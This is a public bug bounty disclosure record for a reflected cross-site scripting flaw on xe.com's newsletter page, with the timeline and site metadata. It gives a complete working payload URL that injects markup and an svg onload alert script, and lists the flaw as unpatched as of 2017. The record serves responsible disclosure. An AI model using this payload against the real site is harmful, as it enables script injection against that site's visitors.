xe.com XSS vulnerability

2015-11-26T13:59:00
ID OBB:109308
Type openbugbounty
Reporter Lewis
Modified 2016-02-18T17:11:00

Description

Vulnerable URL:
http://www.xe.com/email/cus/cus_newsletter.php?basecur=USD&date;=2009-05-20⊂=CUSD3FA4958E1E7%22%3E%3Ch1%3E@Lewis%3C/h1%3E%3Csvg/onload=window.onerror=alert;throw/x/;//
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 466
Google Pagerank| 8
VIP website status:| Yes
Check xe.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 26 November, 2015 13:59 GMT
Vulnerability existence verified and confirmed| 26 November, 2015 16:41 GMT
Vulnerability details disclosed by researcher| 18 February, 2016 17:11 GMT